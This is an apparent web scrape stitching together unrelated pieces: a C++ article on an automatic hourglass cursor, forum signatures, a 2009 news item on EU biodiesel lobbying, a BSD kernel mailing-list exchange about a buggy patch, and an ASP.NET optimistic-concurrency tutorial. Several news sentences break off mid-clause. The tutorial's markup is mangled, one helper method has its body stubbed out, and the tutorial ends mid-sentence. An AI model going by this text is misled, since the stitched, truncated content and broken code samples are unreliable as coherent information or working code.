original_{0}. If, however, the BLL methods' input parameters had names like
old_productName,
old_supplierID, and so on, you'd need to update the
OldValuesParameterFormatString property to
old_{0}.
There's one final property setting that needs to be made in order for the ObjectDataSource to correctly pass the original values to the BLL methods. The ObjectDataSource has a ConflictDetection property that can be assigned to one of two values:
OverwriteChanges - the default value; does not send the original values to the BLL methods' original input parameters
CompareAllValues - does send the original values to the BLL methods; choose this option when using optimistic concurrency
Take a moment to set the
ConflictDetection property to
CompareAllValues.
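If you would rather confirm or set these two properties from code instead of through the Properties window, a minimal code-behind sketch might look like the following (the control ID matches the ObjectDataSource created above; placing this in Page_Load is just one option, and the declarative approach used by the wizard is equivalent):

protected void Page_Load(object sender, EventArgs e)
{
    // Send the GridView's original values to the BLL (required for optimistic concurrency)...
    ProductsOptimisticConcurrencyDataSource.ConflictDetection = ConflictOptions.CompareAllValues;

    // ...and keep the original_{0} naming so they map to the original_* BLL input parameters.
    ProductsOptimisticConcurrencyDataSource.OldValuesParameterFormatString = "original_{0}";
}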
Configuring the GridView's Properties and Fields
With the ObjectDataSource's properties properly configured, let's turn our attention to setting up the GridView. First, since we want the GridView to support editing and deleting, click the Enable Editing and Enable Deleting checkboxes from the GridView's smart tag. This will add a CommandField whose
ShowEditButton and
ShowDeleteButton are both set to
true.
When bound to the
ProductsOptimisticConcurrencyDataSource ObjectDataSource, the GridView contains a field for each of the product's data fields. While such a GridView can be edited, the user experience is anything but acceptable. The
CategoryID and
SupplierID BoundFields will render as TextBoxes, requiring the user to enter the appropriate category and supplier as ID numbers. There will be no formatting for the numeric fields and no validation controls to ensure that the product's name has been supplied and that the unit price, units in stock, units on order, and reorder level values are proper numeric values greater than or equal to zero.
As we discussed in the Adding Validation Controls to the Editing and Inserting Interfaces and Customizing the Data Modification Interface tutorials, the user interface can be customized by replacing the BoundFields with TemplateFields. I've modified this GridView and its editing interface in the following ways:
- Removed the ProductID, SupplierName, and CategoryName BoundFields
- Converted the ProductName BoundField to a TemplateField and added a RequiredFieldValidator control.
- Converted the CategoryID and SupplierID BoundFields to TemplateFields, and adjusted the editing interface to use DropDownLists rather than TextBoxes. In these TemplateFields' ItemTemplates, the CategoryName and SupplierName data fields are displayed.
- Converted the UnitPrice, UnitsInStock, UnitsOnOrder, and ReorderLevel BoundFields to TemplateFields and added CompareValidator controls.
Since we've already examined how to accomplish these tasks in previous tutorials, I'll just list the final declarative syntax here and leave the implementation as practice.
<asp:GridView <Columns> :DropDownList <asp:ListItem</asp:Label> </ItemTemplate> </asp:TemplateField> <asp:TemplateField <EditItemTemplate> <asp:DropDownList <asp:ListItem </asp:ObjectDataSource> </EditItemTemplate> <ItemTemplate> <asp:Label</asp:Label> </ItemTemplate> </asp:TemplateField> <asp:BoundField <asp:TemplateField <EditItemTemplate> :CheckBoxField </Columns> </asp:GridView>
We're very close to having a fully-working example. However, there are a few subtleties that will creep up and cause us problems. Additionally, we still need some interface that alerts the user when a concurrency violation has occurred.
Note: In order for a data Web control to correctly pass the original values to the ObjectDataSource (which are then passed to the BLL), it's vital that the GridView's
EnableViewState property is set to
true (the default). If you disable view state, the original values are lost on postback.
Passing the Correct Original Values to the ObjectDataSource
There are a couple of problems with the way the GridView has been configured. If the ObjectDataSource's
ConflictDetection property is set to
CompareAllValues (as is ours), when the ObjectDataSource's
Update() or
Delete() methods are invoked by the GridView (or DetailsView or FormView), the ObjectDataSource attempts to copy the GridView's original values into its appropriate
Parameter instances. Refer back to Figure 2 for a graphical representation of this process.
Specifically, the GridView's original values are assigned the values in the two-way databinding statements each time the data is bound to the GridView. Therefore, it's essential that the required original values all are captured via two-way databinding and that they are provided in a convertible format.
To see why this is important, take a moment to visit our page in a browser. As expected, the GridView lists each product with an Edit and Delete button in the leftmost column.
Figure 14: The Products are Listed in a GridView (Click to view full-size image)
If you click the Delete button for any product, a
FormatException is thrown.
Figure 15: Attempting to Delete Any Product Results in a
FormatException (Click to view full-size image)
The
FormatException is raised when the ObjectDataSource attempts to read in the original
UnitPrice value. Since the
ItemTemplate has the
UnitPrice formatted as a currency (
<%# Bind("UnitPrice", "{0:C}") %>), it includes a currency symbol, like $19.95. The
FormatException occurs as the ObjectDataSource attempts to convert this string into a
decimal. To circumvent this problem, we have a number of options:
- Remove the currency formatting from the
ItemTemplate. That is, instead of using
<%# Bind("UnitPrice", "{0:C}") %>, simply use
<%# Bind("UnitPrice") %>. The downside of this is that the price is no longer formatted.
- Display the UnitPrice formatted as a currency in the ItemTemplate, but use the Eval keyword to accomplish this. Recall that Eval performs one-way databinding. We still need to provide the UnitPrice value for the original values, so we'll still need a two-way databinding statement in the ItemTemplate, but this can be placed in a Label Web control whose Visible property is set to false. We could use the following markup in the ItemTemplate:
<ItemTemplate> <asp:Label</asp:Label> <asp:Label</asp:Label> </ItemTemplate>
- Remove the currency formatting from the ItemTemplate, using <%# Bind("UnitPrice") %>. In the GridView's RowDataBound event handler, programmatically access the Label Web control within which the UnitPrice value is displayed and set its Text property to the formatted version.
- Leave the UnitPrice formatted as a currency. In the GridView's RowDeleting event handler, replace the existing original UnitPrice value ($19.95) with an actual decimal value using Decimal.Parse (a sketch of this approach follows this list). We saw how to accomplish something similar in the RowUpdating event handler in the Handling BLL- and DAL-Level Exceptions in an ASP.NET Page tutorial.
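As an illustration of the fourth option, here is a minimal sketch of such a RowDeleting event handler (the handler name is an assumption and would be wired up through the GridView's OnRowDeleting attribute; it also assumes the formatted UnitPrice arrives in the e.Values dictionary):

protected void ProductsGrid_RowDeleting(object sender, GridViewDeleteEventArgs e)
{
    // e.Values holds the row's original non-key field values.
    // Replace the currency-formatted string (such as "$19.95") with a plain decimal
    // so the ObjectDataSource can convert it without raising a FormatException.
    object formattedUnitPrice = e.Values["UnitPrice"];
    if (formattedUnitPrice != null)
    {
        e.Values["UnitPrice"] = decimal.Parse(formattedUnitPrice.ToString(),
            System.Globalization.NumberStyles.Currency);
    }
}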
For my example I chose to go with the second approach, adding a hidden Label Web control whose
Text property is two-way data bound to the unformatted
UnitPrice value.
After solving this problem, try clicking the Delete button for any product again. This time you'll get an
InvalidOperationException when the ObjectDataSource attempts to invoke the BLL's
DeleteProduct method.
Figure 16: The ObjectDataSource Cannot Find a Method with the Input Parameters it Wants to Send (Click to view full-size image)
Looking at the exception's message, it's clear that the ObjectDataSource wants to invoke a BLL
DeleteProduct method that includes
original_CategoryName and
original_SupplierName input parameters. This is because the
ItemTemplates for the
CategoryID and
SupplierID TemplateFields currently contain two-way Bind statements with the
CategoryName and
SupplierName data fields. Instead, we need to include
Bind statements with the
CategoryID and
SupplierID data fields. To accomplish this, replace the existing Bind statements with
Eval statements, and then add hidden Label controls whose
Text properties are bound to the
CategoryID and
SupplierID data fields using two-way databinding, as shown below:
<asp:TemplateField <EditItemTemplate> ... </EditItemTemplate> <ItemTemplate> <asp:Label</asp:Label> <asp:Label</asp:Label> </ItemTemplate> </asp:TemplateField> <asp:TemplateField <EditItemTemplate> ... </EditItemTemplate> <ItemTemplate> <asp:Label</asp:Label> <asp:Label</asp:Label> </ItemTemplate> </asp:TemplateField>
With these changes, we are now able to successfully delete and edit product information! In Step 5 we'll look at how to verify that concurrency violations are being detected. But for now, take a few minutes to try updating and deleting a few records to ensure that updating and deleting for a single user works as expected.
Step 5: Testing the Optimistic Concurrency Support
In order to verify that concurrency violations are being detected (rather than resulting in data being blindly overwritten), we need to open two browser windows to this page. In both browser instances, click on the Edit button for Chai. Then, in just one of the browsers, change the name to "Chai Tea" and click Update. The update should succeed and return the GridView to its pre-editing state, with "Chai Tea" as the new product name.
In the other browser window instance, however, the product name TextBox still shows "Chai". In this second browser window, update the
UnitPrice to
25.00. Without optimistic concurrency support, clicking update in the second browser instance would change the product name back to "Chai", thereby overwriting the changes made by the first browser instance. With optimistic concurrency employed, however, clicking the Update button in the second browser instance results in a DBConcurrencyException.
Figure 17: When a Concurrency Violation is Detected, a
DBConcurrencyException is Thrown (Click to view full-size image)
The
DBConcurrencyException is only thrown when the DAL's batch update pattern is utilized. The DB direct pattern does not raise an exception, it merely indicates that no rows were affected. To illustrate this, return both browser instances' GridView to their pre-editing state. Next, in the first browser instance, click the Edit button and change the product name from "Chai Tea" back to "Chai" and click Update. In the second browser window, click the Delete button for Chai.
Upon clicking Delete, the page posts back, the GridView invokes the ObjectDataSource's
Delete() method, and the ObjectDataSource calls down into the
ProductsOptimisticConcurrencyBLL class's
DeleteProduct method, passing along the original values. The original
ProductName value for the second browser instance is "Chai Tea", which doesn't match up with the current
ProductName value in the database. Therefore the
DELETE statement issued to the database affects zero rows since there's no record in the database that the
WHERE clause satisfies. The
DeleteProduct method returns
false and the ObjectDataSource's data is rebound to the GridView.
From the end user's perspective, clicking on the Delete button for Chai Tea in the second browser window caused the screen to flash and, upon coming back, the product is still there, although now it's listed as "Chai" (the product name change made by the first browser instance). If the user clicks the Delete button again, the Delete will succeed, as the GridView's original
ProductName value ("Chai") now matches up with the value in the database.
In both of these cases, the user experience is far from ideal. We clearly don't want to show the user the nitty-gritty details of the
DBConcurrencyException exception when using the batch update pattern. And the behavior when using the DB direct pattern is somewhat confusing, as the user's command failed but there was no precise indication of why.
To remedy these two issues, we can create Label Web controls on the page that provide an explanation to why an update or delete failed. For the batch update pattern, we can determine whether or not a
DBConcurrencyException exception occurred in the GridView's post-level event handler, displaying the warning label as needed. For the DB direct method, we can examine the return value of the BLL method (which is
true if one row was affected,
false otherwise) and display an informational message as needed.
Step 6: Adding Informational Messages and Displaying Them in the Face of a Concurrency Violation
When a concurrency violation occurs, the behavior exhibited depends on whether the DAL's batch update or DB direct pattern was used. Our tutorial uses both patterns, with the batch update pattern being used for updating and the DB direct pattern used for deleting. To get started, let's add two Label Web controls to our page that explain that a concurrency violation occurred when attempting to delete or update data. Set the Label controls'
Visible and
EnableViewState properties to
false; this will cause them to be hidden on each page visit except for those particular page visits where their
Visible property is programmatically set to
true.
<asp:Label <asp:Label
In addition to setting their
Visible,
EnableViewState, and
Text properties, I've also set the
CssClass property to
Warning, which causes the Labels to be displayed in a large, red, italic, bold font. This CSS
Warning class was defined and added to Styles.css back in the Examining the Events Associated with Inserting, Updating, and Deleting tutorial.
After adding these Labels, the Designer in Visual Studio should look similar to Figure 18.
Figure 18: Two Label Controls Have Been Added to the Page (Click to view full-size image)
With these Label Web controls in place, we're ready to examine how to determine when a concurrency violation has occurred, at which point the appropriate Label's
Visible property can be set to
true, displaying the informational message.
Handling Concurrency Violations When Updating
Let's first look at how to handle concurrency violations when using the batch update pattern. Since such violations with the batch update pattern cause a
DBConcurrencyException exception to be thrown, we need to add code to our ASP.NET page to determine whether a
DBConcurrencyException exception occurred during the update process. If so, we should display a message to the user explaining that their changes were not saved because another user had modified the same data between when they started editing the record and when they clicked the Update button.
As we saw in the Handling BLL- and DAL-Level Exceptions in an ASP.NET Page tutorial, such exceptions can be detected and suppressed in the data Web control's post-level event handlers. Therefore, we need to create an event handler for the GridView's
RowUpdated event that checks if a
DBConcurrencyException exception has been thrown. This event handler is passed a reference to any exception that was raised during the updating process, as shown in the event handler code below:
protected void ProductsGrid_RowUpdated(object sender, GridViewUpdatedEventArgs e)
{
    if (e.Exception != null && e.Exception.InnerException != null)
    {
        if (e.Exception.InnerException is System.Data.DBConcurrencyException)
        {
            // Display the warning message and note that the
            // exception has been handled...
            UpdateConflictMessage.Visible = true;
            e.ExceptionHandled = true;
        }
    }
}
In the face of a
DBConcurrencyException exception, this event handler displays the
UpdateConflictMessage Label control and indicates that the exception has been handled. With this code in place, when a concurrency violation occurs when updating a record, the user's changes are lost, since they would have overwritten another user's modifications at the same time. In particular, the GridView is returned to its pre-editing state and bound to the current database data. This will update the GridView row with the other user's changes, which were previously not visible. Additionally, the
UpdateConflictMessage Label control will explain to the user what just happened. This sequence of events is detailed in Figure 19.
Figure 19: A User's Updates are Lost in the Face of a Concurrency Violation (Click to view full-size image)
Note: Alternatively, rather than returning the GridView to the pre-editing state, we could leave the GridView in its editing state by setting the
KeepInEditMode property of the passed-in
GridViewUpdatedEventArgs object to true. If you take this approach, however, be certain to rebind the data to the GridView (by invoking its
DataBind() method) so that the other user's values are loaded into the editing interface. The code available for download with this tutorial has these two lines of code in the
RowUpdated event handler commented out; simply uncomment these lines of code to have the GridView remain in edit mode after a concurrency violation.
Responding to Concurrency Violations When Deleting
With the DB direct pattern, there is no exception raised in the face of a concurrency violation. Instead, the database statement simply affects no records, as the WHERE clause does not match with any record. All of the data modification methods created in the BLL have been designed such that they return a Boolean value indicating whether or not they affected precisely one record. Therefore, to determine if a concurrency violation occurred when deleting a record, we can examine the return value of the BLL's
DeleteProduct method.
The return value for a BLL method can be examined in the ObjectDataSource's post-level event handlers through the
ReturnValue property of the
ObjectDataSourceStatusEventArgs object passed into the event handler. Since we are interested in determining the return value from the
DeleteProduct method, we need to create an event handler for the ObjectDataSource's
Deleted event. The
ReturnValue property is of type
object and can be
null if an exception was raised and the method was interrupted before it could return a value. Therefore, we should first ensure that the
ReturnValue property is not
null and is a Boolean value. Assuming this check passes, we show the
DeleteConflictMessage Label control if the
ReturnValue is
false. This can be accomplished by using the following code:
protected void ProductsOptimisticConcurrencyDataSource_Deleted(
    object sender, ObjectDataSourceStatusEventArgs e)
{
    if (e.ReturnValue != null && e.ReturnValue is bool)
    {
        bool deleteReturnValue = (bool)e.ReturnValue;
        if (deleteReturnValue == false)
        {
            // No row was deleted, display the warning message
            DeleteConflictMessage.Visible = true;
        }
    }
}
In the face of a concurrency violation, the user's delete request is canceled. The GridView is refreshed, showing the changes that occurred for that record between the time the user loaded the page and when he clicked the Delete button. When such a violation transpires, the
DeleteConflictMessage Label is shown, explaining what just happened (see Figure 20).
Figure 20: A User's Delete is Canceled in the Face of a Concurrency Violation (Click to view full-size image)
Summary
Opportunities for concurrency violations exist in every application that allows multiple, concurrent users to update or delete data. If such violations are not accounted for, when two users simultaneously update the same data, whoever gets in the last write "wins," overwriting the other user's changes. Alternatively, developers can implement either optimistic or pessimistic concurrency control. Optimistic concurrency control assumes that concurrency violations are infrequent and simply disallows an update or delete command that would constitute a concurrency violation. Pessimistic concurrency control assumes that concurrency violations are frequent and that simply rejecting one user's update or delete command is not acceptable. With pessimistic concurrency control, updating a record involves locking it, thereby preventing any other users from modifying or deleting the record while it is locked.
The Typed DataSet in .NET provides functionality for supporting optimistic concurrency control. In particular, the
UPDATE and
DELETE statements issued to the database include all of the table's columns, thereby ensuring that the update or delete will only occur if the record's current data matches with the original data the user had when performing their update or delete. Once the DAL has been configured to support optimistic concurrency, the BLL methods need to be updated. Additionally, the ASP.NET page that calls down into the BLL must be configured such that the ObjectDataSource retrieves the original values from its data Web control and passes them down into the BLL.
As we saw in this tutorial, implementing optimistic concurrency control in an ASP.NET web application involves updating the DAL and BLL and adding support in the ASP.NET page. Whether or not this added work is a wise investment of your time and effort depends on your application. If you infrequently have concurrent users updating data, or the data they are updating is different from one another, then concurrency control is not a key issue. If, however, you routinely have multiple users on your site working with the same data, concurrency control can help prevent one user's updates or deletes from unwittingly overwriting another's.
|
http://www.asp.net/web-forms/overview/data-access/editing,-inserting,-and-deleting-data/implementing-optimistic-concurrency-cs
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
module Language.HERMIT.Primitive.Fold
    ( externals
    , foldR
    , stashFoldR
    ) where

import GhcPlugins hiding (empty)

import Control.Applicative
import Control.Monad

import Data.List (intercalate)
import qualified Data.Map as Map

import Language.HERMIT.Monad
import Language.HERMIT.Context
import Language.HERMIT.External
import Language.HERMIT.Kure
import Language.HERMIT.GHC

import Language.HERMIT.Primitive.GHC hiding (externals)
import Language.HERMIT.Primitive.Unfold hiding (externals)

import qualified Language.Haskell.TH as TH

import Prelude hiding (exp)

------------------------------------------------------------------------

externals :: [External]
externals =
    [ external "fold" (promoteExprR . foldR)
        [ "fold a definition"
        , ""
        , "double :: Int -> Int"
        , "double x = x + x"
        , ""
        , "5 + 5 + 6"
        , "any-bu (fold 'double)"
        , "double 5 + 6"
        , ""
        , "Note: due to associativity, if you wanted to fold 5 + 6 + 6, "
        , "you first need to apply an associativity rewrite."
        ] .+ Context .+ Deep
    , external "fold" (promoteExprR . stashFoldR)
        [ "Fold a remembered definition." ] .+ Context .+ Deep
    ]

------------------------------------------------------------------------

stashFoldR :: String -> RewriteH CoreExpr
stashFoldR label = prefixFailMsg "Fold failed: " $
    translate $ \ c e -> do
        Def i rhs <- lookupDef label
        guardMsg (inScope c i) $ var2String i ++ " is not in scope.\n(A common cause of this error is trying to fold a recursive call while being in the body of a non-recursive definition. This can be resolved by calling \"nonrec-to-rec\" on the non-recursive binding group.)"
        maybe (fail "no match.") return (fold i rhs e)

foldR :: TH.Name -> RewriteH CoreExpr
foldR nm = prefixFailMsg "Fold failed: " $
    translate $ \ c e -> do
        i <- case filter (cmpTHName2Id nm) $ Map.keys (hermitBindings c) of
                [] -> fail "cannot find name."
                [i] -> return i
                is -> fail $ "multiple names match: " ++ intercalate ", " (map var2String is)
        either fail
               (\(rhs,_d) -> maybe (fail "no match.") return (fold i rhs e))
               (getUnfolding False False i c)

fold :: Id -> CoreExpr -> CoreExpr -> Maybe CoreExpr
fold i lam exp = do
    let (vs,body) = foldArgs lam
        -- return Nothing if not equal, so sequence will fail below
        checkEqual :: Maybe CoreExpr -> Maybe CoreExpr -> Maybe CoreExpr
        checkEqual m1 m2 = ifM (exprEqual <$> m1 <*> m2) m1 Nothing

    al <- foldMatch vs [] body exp

    let m = Map.fromListWith checkEqual [ (k, Just v) | (k,v) <- al ]

    es <- sequence [ join (Map.lookup v m) | v <- vs ]

    return $ mkCoreApps (Var i) es

-- | Collect arguments to function we are folding, so we can unify with them.
foldArgs :: CoreExpr -> ([Var], CoreExpr)
foldArgs = go []
    where go vs (Lam v e) = go (v:vs) e
          go vs e = (reverse vs, e)

-- Note: Id in the concrete instance is first
-- (not the Id found in the definition we are trying to fold).
addAlpha :: Id -> Id -> [(Id,Id)] -> [(Id,Id)]
addAlpha rId lId alphas | rId == lId = alphas
                        | otherwise = (rId,lId) : alphas

-- Note: return list can have duplicate keys, caller is responsible
-- for checking that dupes refer to same expression
foldMatch :: [Var]     -- ^ vars that can unify with anything
          -> [(Id,Id)] -- ^ alpha equivalences, wherever there is binding
                       --   note: we depend on behavior of lookup here, so new entries
                       --   should always be added to the front of the list so
                       --   we don't have to explicity remove them when shadowing occurs
          -> CoreExpr  -- ^ pattern we are matching on
          -> CoreExpr  -- ^ expression we are checking
          -> Maybe [(Var,CoreExpr)] -- ^ mapping of vars to expressions, or failure
foldMatch vs as (Var i) e | i `elem` vs = return [(i,e)]
                          | otherwise = case e of
                                          Var i' | maybe False (==i) (lookup i' as) -> return [(i,e)]
                                                 | i == i' -> return []
                                          _ -> Nothing
foldMatch _ _ (Lit l) (Lit l') | l == l' = return []
foldMatch vs as (App e a) (App e' a') = do
    x <- foldMatch vs as e e'
    y <- foldMatch vs as a a'
    return (x ++ y)
foldMatch vs as (Lam v e) (Lam v' e') = foldMatch (filter (==v) vs) (addAlpha v' v as) e e'
foldMatch vs as (Let (NonRec v rhs) e) (Let (NonRec v' rhs') e') = do
    x <- foldMatch vs as rhs rhs'
    y <- foldMatch (filter (==v) vs) (addAlpha v' v as) e e'
    return (x ++ y)
-- TODO: this depends on bindings being in the same order
foldMatch vs as (Let (Rec bnds) e) (Let (Rec bnds') e')
    | length bnds == length bnds' = do
        let vs' = filter (`elem` map fst bnds) vs
            as' = [ (v',v) | ((v,_),(v',_)) <- zip bnds bnds' ] ++ as
            bmatch (_,rhs) (_,rhs') = foldMatch vs' as' rhs rhs'
        x <- zipWithM bmatch bnds bnds'
        y <- foldMatch vs' as' e e'
        return (concat x ++ y)
foldMatch vs as (Tick t e) (Tick t' e') | t == t' = foldMatch vs as e e'
foldMatch vs as (Case s b ty alts) (Case s' b' ty' alts')
    | (eqType ty ty') && (length alts == length alts') = do
        let as' = addAlpha b' b as
        x <- foldMatch vs as' s s'
        let vs' = filter (/=b) vs
            altMatch (ac, is, e) (ac', is', e')
                | ac == ac' = foldMatch (filter (`notElem` is) vs') (zip is' is ++ as') e e'
            altMatch _ _ = Nothing
        y <- zipWithM altMatch alts alts'
        return (x ++ concat y)
foldMatch vs as (Cast e c) (Cast e' c') | coreEqCoercion c c' = foldMatch vs as e e'
foldMatch _ _ (Type t) (Type t') | eqType t t' = return []
foldMatch _ _ (Coercion c) (Coercion c') | coreEqCoercion c c' = return []
foldMatch _ _ _ _ = Nothing
|
http://hackage.haskell.org/package/hermit-0.1.2.0/docs/src/Language-HERMIT-Primitive-Fold.html
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
/*
This file is part of [aconnect] library.
Author: Artem Kustikov (kustikoff[at]tut.by)
version: 0.1
This code is provided 'as-is', without any express or implied
warranty. In no event will the authors be held liable for any
damages arising from the use of this code.
Permission is granted to anyone to use this code for any
purpose, including commercial applications, and to alter it and
redistribute it freely, subject to the following restrictions:
1. The origin of this code must not be misrepresented; you must
not claim that you wrote the original code. If you use this
code in a product, an acknowledgment in the product documentation
would be appreciated but is not required.
2. Altered source versions must be plainly marked as such, and
must not be misrepresented as being the original code.
3. This notice may not be removed or altered from any source
distribution.
*/
#ifndef ACONNECT_DEFAULTS_H
#define ACONNECT_DEFAULTS_H
#include "network.hpp"
namespace aconnect
{
//),
reuseAddr (true),
enablePooling (true),
workersCount (500),
workerLifeTime (300),
socketReadTimeout (60),
socketWriteTimeout (60)
{ }
};
}
#endif // ACONNECT_DEFAULTS_H
|
http://www.codeproject.com/script/Articles/ViewDownloads.aspx?aid=26556&zep=ahttplib%2Faconnect%2Fserver_settings.hpp&rzp=%2FKB%2Fcpp%2Fahttpserver%2F%2Fahttpserver_src.zip
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
Why notify/notifyAll() method doesnt invoke a waiting thread quickly?????
sajjad ahmad
Ranch Hand
Joined: Jan 23, 2003
Posts: 78
posted
Apr 22, 2007 10:03:00
I am currently working on a socket-based IM server. I get messages from multiple clients simultaneously and put them into queues; for each queue in my server I have a separate listener running in a thread. As soon as a packet comes into a queue (from any client), its related thread is notified to get that packet from the queue and process it.
Here I am using a wait/notify blocking mechanism to control the loop in my listener thread. My logic works like this:
1) When the listener thread starts it calls the synchronized getNextPacket method on that queue. If the queue has any packet (i.e. its length is greater than zero) then it will remove that packet from the underlying vector (NOTE: I am using Vector to contain packets) and return that packet to the listener thread; else, if the queue doesn't have any packet (i.e. its size is zero), I call the wait() method, which causes the listener thread to wait.
2) Now when any client adds some packet to that queue using the synchronized addPacket() method, I first add that packet to the underlying vector and then call notify()/notifyAll() to wake the listener thread, which again calls the getNextPacket() method, and this cycle continues like this.
So multiple threads (clients) are adding data to the queue using a synchronized method, and only one listener thread is getting data from that queue, again using a synchronized method.
This approach works fine, but sometimes I have noticed that the listener thread doesn't resume just after notify()/notifyAll() has been called; sometimes it resumes after a long time, and sometimes it doesn't resume at all (after waiting a long time I assumed this).
Solutions I tried:
1) I set the listener thread's priority to maximum but faced the same problem again.
For better understanding I am also sending you the code for my queue class and its listener thread.
CODE OF QUEUE CLASS
import java.util.Vector;
import org.apache.log4j.Logger;
import com.tcm.unicorn.server.UnicornCustomeObject;

/**
 * @author sajjad.paracha
 *
 */
public class UIMPCommandsQueue {

    private static final Logger logger = Logger.getLogger(UIMPCommandsQueue.class);

    /**
     * Contains all the packets from clients
     */
    private Vector<UnicornCustomeObject> unicornCustomeObjectQueue = new Vector<UnicornCustomeObject>();

    private UIMPCommandsQueue() {
    }

    private static UIMPCommandsQueue uIMPCommandsQueue = null;

    public static UIMPCommandsQueue getInstance() {
        synchronized (UIMPCommandsQueue.class) {
            if (uIMPCommandsQueue != null) {
                return uIMPCommandsQueue;
            } else
                return uIMPCommandsQueue = new UIMPCommandsQueue();
        }
    }

    /**
     * Adds a new command
     * @param unicornCustomeObject
     */
    public synchronized void addCommandPakcet(UnicornCustomeObject unicornCustomeObject) {
        logger.debug("[[[[[[[[[[[[[[[[[[[[[[[[[[ Going to add a packet in queue no "
                + unicornCustomeObject.getClientSession().getRequestQueueNo());
        unicornCustomeObjectQueue.add(unicornCustomeObject);
        //** Notify the Listener (RequestProcessor) Thread that a new packet has been arrived in the queue
        //** So it now can again start it's processing
        notifyAll();
    }

    /**
     * Removes an object from queue whose processing has been started or completed
     * @param unicornCustomeObject
     * @return
     */
    private boolean removeCommandPacket(UnicornCustomeObject unicornCustomeObject) {
        return unicornCustomeObjectQueue.remove(unicornCustomeObject);
    }

    /**
     * <p> If no packet is available in queue it retuns null value
     * otherwise returns an object from that queue
     * <p>
     * @return unicornCustomeObject
     */
    public synchronized UnicornCustomeObject getNextCommandPacket() {
        if (unicornCustomeObjectQueue.size() > 0) {
            UnicornCustomeObject unicornCustomeObject = unicornCustomeObjectQueue.get(0);
            logger.debug("[[[[[[[[[[[[[[[[[[[[[[[[[[ Got a packet from queue no "
                    + unicornCustomeObject.getClientSession().getRequestQueueNo());
            logger.debug("[[[[[[[[[[[[[[[[[[[[[[[[[[ Going to remove a packet from queue no "
                    + unicornCustomeObject.getClientSession().getRequestQueueNo());
            removeCommandPacket(unicornCustomeObject);
            return unicornCustomeObject;
        } else {
            try {
                //** Force the Listener (RequestProcessor) Thread to wait for notification
                //** This Thread will be only notified if a new command packet has been arrived(added) in the
                //** Queue i.e in addCommandPacket Method
                wait();
            } catch (InterruptedException e) {
                logger.error("", e);
            }
            return null;
        }
    }
}
CODE OF LISTENER CLASS
import org.apache.log4j.Logger;
import com.tcm.unicorn.server.UnicornCustomeObject;

public class RequestProcessor implements Runnable {

    /**
     * will listen on Request queue for any new massages
     */
    public void run() {
        //** get an instance of RequestQueue before the loop
        UIMPCommandsQueue requestQueue = UIMPCommandsQueue.getInstance();
        while (true) {
            try {
                //** call the blocking method getNextCommandPacket()
                UnicornCustomeObject unicornCustomeObject = requestQueue.getNextCommandPacket();
                if (unicornCustomeObject != null) {
                    System.out.println("Got a pcket will process it now.......");
                }
            } catch (Exception exp) {
                exp.printStackTrace();
            }
        }
    }
}
Can anybody please tell me where I am doing something wrong, and what's the best way to get rid of this situation?
Thanks in advance
[ April 22, 2007: Message edited by: sajjad ahmad ]
Jim Yingst
Wanderer
Sheriff
Joined: Jan 30, 2000
Posts: 18671
posted
Apr 22, 2007 19:37:00
Looking at your code, I don't see a cause for the behavior you describe. However, the getNextCommandPacket() method does seem rather strange. It looks like any time it can't find a command, it will wait,
and then return null
. It is
guaranteed
to return null after a wait. Why do that? Isn't the purpose of the wait to wait until you can return something besides null? I recommend you put a loop inside the getNextCommandPacket() method, so that the method rechecks if size() > 0 after each wait. Once you have size() > 0,
then
you can return. And then there's no need to check for null later.
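A minimal sketch of that loop-around-wait shape, written as a drop-in replacement for the getNextCommandPacket() method of the UIMPCommandsQueue class above (this is an illustration, not code from the thread):

public synchronized UnicornCustomeObject getNextCommandPacket() {
    // Recheck the condition after every wake-up; this also guards against spurious wake-ups.
    while (unicornCustomeObjectQueue.size() == 0) {
        try {
            wait();
        } catch (InterruptedException ie) {
            Thread.currentThread().interrupt();
            return null; // or rethrow, depending on how the caller should react
        }
    }
    // The queue is guaranteed to be non-empty here, so callers never see null for an empty queue.
    return unicornCustomeObjectQueue.remove(0);
}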
Refactoring the code a bit may make the problem go away. If not, I would recommend adding more logging. In particular, add log statements immediately before and after the wait() call, and before and after the notifyAll(). These log statements can also include the name of the thread doing the logging. In log4j you can get this easily by including %t in the
PatternLayout
configuration. Or you can print it with Thread.currentThread().getName() if you need to. This will be useful to tell you which thread is doing what.
The objective here is to discover if the listener thread is really in the wait() method when notifyAll() is being sent, or if it's doing something else. If it's doing something else, then you can add more logging statements elsewhere in the program to discover just what the listener is doing when the notifyAll() is sent. That will help increase understanding of what's really happening. Hope that helps...
"I'm not back." - Bill Harding,
Twister
Chris Hurst
Ranch Hand
Joined: Oct 26, 2003
Posts: 420
posted
Apr 23, 2007 06:23:00
Try a sleep(1) after returning from addCommandPakcet in the other thread (not in the sync'ed block).
Also, your wait should really be in a loop of some form, to guard against spurious thread wake-ups (rare, but it is possible for wait to return without a notify).
"Eagles may soar but weasels don't get sucked into jet engines" SCJP 1.6, SCWCD 1.4, SCJD 1.5,SCBCD 5
Mr. C Lamont Gilbert
Ranch Hand
Joined: Oct 05, 2001
Posts: 1170
posted
Apr 24, 2007 07:37:00
I suspect by the time you call notify, many of your threads have already returned and are not waiting. So it may look like they are ignoring the call, but it's because they were no longer waiting when the call was made.
|
http://www.coderanch.com/t/233764/threads/java/notify-notifyAll-method-doesnt-invoke
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
Data validation using Fluent Validation in Windows Phone
This article explains how to validate data in Windows Phone 8 using the Fluent Validation library.
Windows Phone 8
Introduction
Data validation is required almost everywhere an app takes data input. There are many approaches for Silverlight/WPF, and most of them will also work in Windows Phone.
This code example explains how to use the Fluent Validation library (available on Nuget), which describes itself as "a small validation library for .NET that uses a fluent interface and lambda expressions for building validation rules for your business objects". The library is simple to use and makes it very easy to define complex but readable validation rules.
The demo app is a simple user registration form into which a user can enter their name, birth date and country. The example integrates with the MVVM Light Toolkit and its SimpleIoc. The Fluent Validation codeplex page has additional examples.
Adding the package
We start off with an empty solution, add the MVVM Light libraries, and bind the DataContext of MainPage to MainViewModel in the normal way. Once the MVVM setup is complete it's time to add the Fluent Validation package to the project.
Install-Package FluentValidation
Fluent Validation is an open source project available on Codeplex
The settings of the portable class library are shown below. Note, the implementation below will work just as well on Windows Store apps!
The full set of libraries supported by Fluent Validation is: .NET 4.0, MVC 3, MVC 4, MVC 5, Portable
Creating the model
There is only one model class in this app, called Member. This defines the user's name, birth date, and country.
public class Member
{
public string Name { get; set; }
public DateTime BirthDate { get; set; }
public string Country { get; set; }
}
Setting up the validation
